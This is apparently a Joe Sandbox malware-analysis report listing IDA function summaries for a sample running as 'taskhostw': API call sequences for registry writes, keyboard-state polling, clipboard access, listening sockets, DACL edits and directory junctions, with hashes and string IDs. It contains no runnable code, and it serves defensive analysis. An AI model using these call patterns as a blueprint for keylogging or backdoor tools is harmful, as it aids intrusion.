                                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                  • API String ID: 3953360268-2428617273
                                                                  • Opcode ID: 07b222a020768c1b3714f76b3ba24e15f3c9880a67d264068382fb249becee43
                                                                  • Instruction ID: a026c742caa1982a970a2acd76e39095b94e7196ba2b4a6313e7062e7635b02b
                                                                  • Opcode Fuzzy Hash: 07b222a020768c1b3714f76b3ba24e15f3c9880a67d264068382fb249becee43
                                                                  • Instruction Fuzzy Hash: 2AA13CB2418305ABC740EF64C986DEFB7ECAFA4704F404929F695D3191EB34DA49CB62
                                                                  APIs
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002309DE
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0023F910,00000000,?,00000000,?,?), ref: 00230A4C
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00230A94
                                                                  • RegSetValueExW.ADVAPI32 ref: 00230B1D
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00230E3D
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00230E4A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                  • API String ID: 536824911-966354055
                                                                  • Opcode ID: 00abef8c3685840dc22b18a733b9aa3ed0da99eef066115f7a1bdc3a54d71c68
                                                                  • Instruction ID: 351a37edef9addc587ee71ac2aaeca31e1908b21ba1f3c7d1060d539e3448a67
                                                                  • Opcode Fuzzy Hash: 00abef8c3685840dc22b18a733b9aa3ed0da99eef066115f7a1bdc3a54d71c68
                                                                  • Instruction Fuzzy Hash: B002BE752106129FCB14EF24C895E6ABBE5FF88714F04885DF98A9B362CB30ED51CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0D%$0E%$0F%$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG%
                                                                  • API String ID: 0-1014044530
                                                                  • Opcode ID: ca94349f9ae311144ff1d5115d2394cce1faf9ecdf91f23fbe166e64b2b83279
                                                                  • Instruction ID: 4e2a8072497de36c67c0cb0db304828044eea8df65eb83b774ff8f63f01fd4d8
                                                                  • Opcode Fuzzy Hash: ca94349f9ae311144ff1d5115d2394cce1faf9ecdf91f23fbe166e64b2b83279
                                                                  • Instruction Fuzzy Hash: B3726F75E103199BDB14CF99C880BADB7B5FF58310F14816AE849EB291EB70DE91CB90
                                                                  APIs
                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0021A299
                                                                  • __swprintf.LIBCMT ref: 0021A2BB
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0021A2F8
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0021A31D
                                                                  • _memset.LIBCMT ref: 0021A33C
                                                                  • _wcsncpy.LIBCMT ref: 0021A378
                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0021A3AD
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0021A3B8
                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 0021A3C1
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0021A3CB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                  • String ID: :$\$\??\%s
                                                                  • API String ID: 2733774712-3457252023
                                                                  • Opcode ID: 38072e13fe1bc092dd3c52f33fd8e5519d8cc34ef0c481342f5811a9fa56f260
                                                                  • Instruction ID: 87b3c2edfba4570409485b332752bd1206a9f29ada95e91e6b0b30b191e6a71d
                                                                  • Opcode Fuzzy Hash: 38072e13fe1bc092dd3c52f33fd8e5519d8cc34ef0c481342f5811a9fa56f260
                                                                  • Instruction Fuzzy Hash: EB31E67191010AABDB20DFA0EC49FEF73BCEF99740F1041B6F918D2160EB7096948B25
                                                                  APIs
                                                                    • Part of subcall function 0020852A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00208546
                                                                    • Part of subcall function 0020852A: GetLastError.KERNEL32(?,0020800A,?,?,?), ref: 00208550
                                                                    • Part of subcall function 0020852A: GetProcessHeap.KERNEL32(00000008,?,?,0020800A,?,?,?), ref: 0020855F
                                                                    • Part of subcall function 0020852A: HeapAlloc.KERNEL32(00000000,?,0020800A,?,?,?), ref: 00208566
                                                                    • Part of subcall function 0020852A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0020857D
                                                                    • Part of subcall function 002085C7: GetProcessHeap.KERNEL32(00000008,00208020,00000000,00000000,?,00208020,?), ref: 002085D3
                                                                    • Part of subcall function 002085C7: HeapAlloc.KERNEL32(00000000,?,00208020,?), ref: 002085DA
                                                                    • Part of subcall function 002085C7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00208020,?), ref: 002085EB
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00208238
                                                                  • _memset.LIBCMT ref: 0020824D
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0020826C
                                                                  • GetLengthSid.ADVAPI32(?), ref: 0020827D
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 002082BA
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002082D6
                                                                  • GetLengthSid.ADVAPI32(?), ref: 002082F3
                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00208302
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00208309
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0020832A
                                                                  • CopySid.ADVAPI32(00000000), ref: 00208331
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00208362
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00208388
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0020839C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                  • String ID:
                                                                  • API String ID: 3996160137-0
                                                                  • Opcode ID: d6ec69e5b1e4dfbe6d2a4432e4115e4a0958dbc29f7e807bd4ea919f584b0e30
                                                                  • Instruction ID: 481e36c30897c975da0eb6c73b317891973aa2f35a0103d79eaa925251a3b3af
                                                                  • Opcode Fuzzy Hash: d6ec69e5b1e4dfbe6d2a4432e4115e4a0958dbc29f7e807bd4ea919f584b0e30
                                                                  • Instruction Fuzzy Hash: DB61797191020AEFCF14CFA4EC48AEEBB79FF44700F048169F955A6292DB309A24CF60
                                                                  APIs
                                                                    • Part of subcall function 00230EA5: CharUpperBuffW.USER32(?,?), ref: 00230EBC
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00230537
                                                                    • Part of subcall function 001B9997: __itow.LIBCMT ref: 001B99C2
                                                                    • Part of subcall function 001B9997: __swprintf.LIBCMT ref: 001B9A0C
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002305D6
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0023066E
                                                                  • RegCloseKey.ADVAPI32(000000FE), ref: 002308AD
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 002308BA
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1240663315-0
                                                                  • Opcode ID: 655b066993206d9c8c8ad755e1750c7975d6af8e04db7c86829de1472daebca7
                                                                  • Instruction ID: f341d195a85719956ce91eff0ac8fd42a56a9a98c23562f487a0096d6f2719ec
                                                                  • Opcode Fuzzy Hash: 655b066993206d9c8c8ad755e1750c7975d6af8e04db7c86829de1472daebca7
                                                                  • Instruction Fuzzy Hash: B2E18D70614201AFCB14DF29C995E6ABBE9FF88714F04846DF44ADB262DB30ED15CB51
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 00210062
                                                                  • GetAsyncKeyState.USER32 ref: 002100E3
                                                                  • GetKeyState.USER32(000000A0), ref: 002100FE
                                                                  • GetAsyncKeyState.USER32 ref: 00210118
                                                                  • GetKeyState.USER32(000000A1), ref: 0021012D
                                                                  • GetAsyncKeyState.USER32 ref: 00210145
                                                                  • GetKeyState.USER32(00000011), ref: 00210157
                                                                  • GetAsyncKeyState.USER32 ref: 0021016F
                                                                  • GetKeyState.USER32(00000012), ref: 00210181
                                                                  • GetAsyncKeyState.USER32 ref: 00210199
                                                                  • GetKeyState.USER32(0000005B), ref: 002101AB
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: 7e48d02c8a16f019ffab200bd7dfa81fa5e0afda132a79f52607c0d8c84182e5
                                                                  • Instruction ID: e9d0dfcc3c38d09fc2a2b7497354da99ffa5e0cc59b243e22ab8775be53d5736
                                                                  • Opcode Fuzzy Hash: 7e48d02c8a16f019ffab200bd7dfa81fa5e0afda132a79f52607c0d8c84182e5
                                                                  • Instruction Fuzzy Hash: FF41D9249147CB79FF309E6099843F5BEE0AF35340F48809AD5C9461C2E7E89DE4C7A2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0DJ$0DJ$ERCP$VUUU$VUUU$VUUU$VUUU
                                                                  • API String ID: 0-223423113
                                                                  • Opcode ID: 654ce61f7dd2a742b13c357ea2056ced6e37c8b4fba539751acb9a4fac51e2ed
                                                                  • Instruction ID: fafac94fff1f58ffb84777dd5369c27f3f0768804b817c8e555e4fbfb57d150a
                                                                  • Opcode Fuzzy Hash: 654ce61f7dd2a742b13c357ea2056ced6e37c8b4fba539751acb9a4fac51e2ed
                                                                  • Instruction Fuzzy Hash: F3A26DB0E0021ACBDF24CF59C9947BDB7B1BF44B14F1485EAE956A7280DB319A86CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0D%$0D%$ERCP$VUUU$VUUU$VUUU$VUUU
                                                                  • API String ID: 0-3220804341
                                                                  • Opcode ID: a4f685f82a4161a2f8d4e267eeca27f3b14dd7ec16540c22f550061ce84bcead
                                                                  • Instruction ID: 6360f05b09740af949ebeac484009c2c9839d45277e87519f27393d80a1de0ff
                                                                  • Opcode Fuzzy Hash: a4f685f82a4161a2f8d4e267eeca27f3b14dd7ec16540c22f550061ce84bcead
                                                                  • Instruction Fuzzy Hash: 9DA27F74E0822ACBDF28CF58C960BBDB7B1BB64314F2581AED959A7284D770DD81CB50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                  • String ID:
                                                                  • API String ID: 1737998785-0
                                                                  • Opcode ID: 12d8102a1793ccf7fec209e3a51bb3ca362e0d7b3090337c5b2b77735acd4955
                                                                  • Instruction ID: adb7a18bfd4ed74da35683cf5cc16d9e603dc2f01cc1326438427c4ad78b7651
                                                                  • Opcode Fuzzy Hash: 12d8102a1793ccf7fec209e3a51bb3ca362e0d7b3090337c5b2b77735acd4955
                                                                  • Instruction Fuzzy Hash: 6F217A35610621AFEB10AFA1FD4EB6E77A8EF14710F10806AFD56DB2B1DB70A8118B54
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID:
                                                                  • API String ID: 4104443479-0
                                                                  • Opcode ID: 837f325ad964d4244a1dbd246846212314ca8241948a41978c0ca760d4cf362a
                                                                  • Instruction ID: f33f391b83206a46bbdfbfe53b55b11649c74458503af3cf808a15cf6346ecc3
                                                                  • Opcode Fuzzy Hash: 837f325ad964d4244a1dbd246846212314ca8241948a41978c0ca760d4cf362a
                                                                  • Instruction Fuzzy Hash: 4D125870A006199FDF14DFA9DA84AEEB7F6FF48304F108569E806E7290EF35A911CB54
                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002263F2
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00226401
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 0022641D
                                                                  • listen.WSOCK32(00000000,00000005), ref: 0022642C
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00226446
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 0022645A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                  • String ID:
                                                                  • API String ID: 1279440585-0
                                                                  • Opcode ID: 404201eb1939d33f735620c11724fca85ef00f1c008c508f94d10f55ce56eacd
                                                                  • Instruction ID: 6fbe2fd7b80ff366c9a8c6c9973a946d01bb9ff9056483c2ef5c3046d3741143
                                                                  • Opcode Fuzzy Hash: 404201eb1939d33f735620c11724fca85ef00f1c008c508f94d10f55ce56eacd
                                                                  • Instruction Fuzzy Hash: 5021E131600211AFCB10EFA4E949B6EB7A9EF44720F108168F956A73E2CB70AC11CB51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: pbL
                                                                  • API String ID: 0-2198975964
                                                                  • Opcode ID: cb8729c52343b53710d90e753b25f9369214f47dccec846f2bc71a0ac487be56
                                                                  • Instruction ID: 847ebf4a5b9897f9ed90dd0389805578e7e6bf7100ec46fae175d23d62a4cba0
                                                                  • Opcode Fuzzy Hash: cb8729c52343b53710d90e753b25f9369214f47dccec846f2bc71a0ac487be56
                                                                  • Instruction Fuzzy Hash: D39256706083519FDB20DF24C580B2BB7F5BF89308F14896DE98A8B661DB75E845CF92
                                                                  APIs
                                                                    • Part of subcall function 02A70336: std::exception::exception.LIBCMT ref: 02A7036C
                                                                    • Part of subcall function 02A70336: __CxxThrowException@8.LIBCMT ref: 02A70381
                                                                  • _memmove.LIBCMT ref: 02A9F9AE
                                                                  • _memmove.LIBCMT ref: 02A9FAC3
                                                                  • _memmove.LIBCMT ref: 02A9FB6A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 1300846289-0
                                                                  • Opcode ID: e83a155bf61ab41bcb8dfa51c36b184f9cdf33b0d0cfab516184054cc245601c
                                                                  • Instruction ID: 2b14ceff32ee00687080d4d7f4b179d651b69f78d8cf85744b5a4ecbef1ae306
                                                                  • Opcode Fuzzy Hash: e83a155bf61ab41bcb8dfa51c36b184f9cdf33b0d0cfab516184054cc245601c
                                                                  • Instruction Fuzzy Hash: A2027EB1A00215DFDF14DF65DA80AAEBBF6EF48304F1580A9E806DB254EF31DA50CB95
                                                                  APIs
                                                                    • Part of subcall function 00227EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00227ECB
                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002268B4
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002268DD
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00226916
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00226923
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00226937
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 99427753-0
                                                                  • Opcode ID: d57b32d860b550a7bc2b368d375ece77008db48d06ff867d2e3acad7a931e484
                                                                  • Instruction ID: bc4c0126a3ee79c3df5e6b1449c5581b5675b6aa5e9f60b81df08a891bb9b559
                                                                  • Opcode Fuzzy Hash: d57b32d860b550a7bc2b368d375ece77008db48d06ff867d2e3acad7a931e484
                                                                  • Instruction Fuzzy Hash: ED41EA75A00210AFEB10AF64ED86FAE77A9DF14B10F44815CFA1AAB3D3DB709D018791
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 0021C4BE
                                                                  • CoCreateInstance.OLE32(00242D6C,00000000,00000001,00242BDC,?), ref: 0021C4D6
                                                                    • Part of subcall function 001B7F41: _memmove.LIBCMT ref: 001B7F82
                                                                  • CoUninitialize.OLE32 ref: 0021C743
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                  • String ID: .lnk
                                                                  • API String ID: 2683427295-24824748
                                                                  • Opcode ID: aaf7c0c03f7cb26aa1bda15ea4df9627f2a19c4de550689ca80904dae0788083
                                                                  • Instruction ID: 17ad4661051b5687fdd3fffbd7905d5272a35f6f1d8fb9e20e75bb8717dacfad
                                                                  • Opcode Fuzzy Hash: aaf7c0c03f7cb26aa1bda15ea4df9627f2a19c4de550689ca80904dae0788083
                                                                  • Instruction Fuzzy Hash: 3FA11C71118305AFD304EF64C891EABB7ECEFA5704F00495CF256971A2DB71EA4ACB62
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0022C112
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,001F1CB7,?), ref: 0022C124
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                  • API String ID: 2574300362-1816364905
